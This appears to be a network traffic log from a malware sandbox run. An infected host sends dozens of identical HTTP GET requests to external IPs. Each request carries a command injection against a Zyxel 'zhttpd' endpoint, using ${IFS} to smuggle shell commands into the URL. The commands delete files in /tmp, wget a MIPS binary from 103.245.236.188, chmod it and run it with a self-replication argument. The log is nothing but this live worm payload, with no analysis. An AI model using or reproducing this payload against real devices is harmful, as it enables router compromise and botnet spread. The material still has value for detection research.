                                    Jan 13, 2024 19:02:29.067717075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3271192.168.2.135959280.222.210.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067780972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3272192.168.2.1333456105.234.153.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067821980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3273192.168.2.1352996137.180.131.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067929029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3274192.168.2.1348632205.123.3.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.067958117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3275192.168.2.1337144218.228.226.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.072467089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3276192.168.2.1338304181.120.158.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.072530031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3277192.168.2.1346018192.26.60.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.073003054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3278192.168.2.13377585.156.148.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.073033094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3279192.168.2.1337126167.123.213.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.073167086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3280192.168.2.1342710126.116.234.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.073199034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3281192.168.2.135220685.171.178.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.073283911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3282192.168.2.133418824.64.8.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.073345900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3283192.168.2.1343798142.130.193.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.073390961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3284192.168.2.1343602165.42.144.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.073456049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3285192.168.2.13355808.114.253.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.075783968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3286192.168.2.134673614.127.57.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076004982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3287192.168.2.1354364206.94.252.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076109886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3288192.168.2.1345328149.65.236.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076145887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3289192.168.2.133363863.254.35.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076239109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3290192.168.2.13486605.43.21.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076307058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3291192.168.2.1343124199.215.69.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076350927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3292192.168.2.135388484.77.163.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076391935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3293192.168.2.135422435.155.51.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076443911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3294192.168.2.134026865.238.208.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076500893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3295192.168.2.1338306193.53.166.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076556921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3296192.168.2.134351040.16.27.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076601982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3297192.168.2.1334492179.139.75.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076637030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3298192.168.2.135288241.221.82.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076711893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3299192.168.2.1346538147.58.102.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076771021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3300192.168.2.1340726102.167.241.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076828003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3301192.168.2.1350846190.128.12.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076884985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3302192.168.2.1341196129.29.189.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.076939106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3303192.168.2.133544077.225.195.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077003956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3304192.168.2.1349858186.46.187.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077053070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3305192.168.2.134367053.26.81.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077073097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3306192.168.2.1339974113.242.41.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077135086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3307192.168.2.134432284.60.73.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077171087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3308192.168.2.1333944140.196.255.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077256918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3309192.168.2.13479685.119.54.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077315092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3310192.168.2.1337332114.5.55.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077370882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3311192.168.2.133835819.32.44.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077444077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3312192.168.2.1355912216.107.151.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077486992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3313192.168.2.1333846138.45.102.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077560902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3314192.168.2.1348986155.61.66.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077584982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3315192.168.2.1349712118.237.105.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077661991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3316192.168.2.134733027.216.245.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077711105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3317192.168.2.1342350108.166.21.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077765942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3318192.168.2.134585632.205.49.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077821016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3319192.168.2.135252858.229.231.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077894926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3320192.168.2.133976432.57.0.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.077966928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3321192.168.2.1351858119.79.109.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078001976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3322192.168.2.135386480.208.188.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078047991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3323192.168.2.1338416170.232.19.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078105927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3324192.168.2.1346984126.123.18.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078159094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3325192.168.2.13412141.108.77.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078202009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3326192.168.2.134481820.104.207.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078238964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3327192.168.2.134651868.34.201.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078327894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3328192.168.2.1355130189.117.191.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078376055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3329192.168.2.1355564201.109.89.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078417063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3330192.168.2.135560671.238.102.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078474998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3331192.168.2.1349098108.136.138.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078552008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3332192.168.2.1341134206.54.213.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078619003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3333192.168.2.1344100110.66.193.121443
                                    TimestampBytes transferredDirectionData
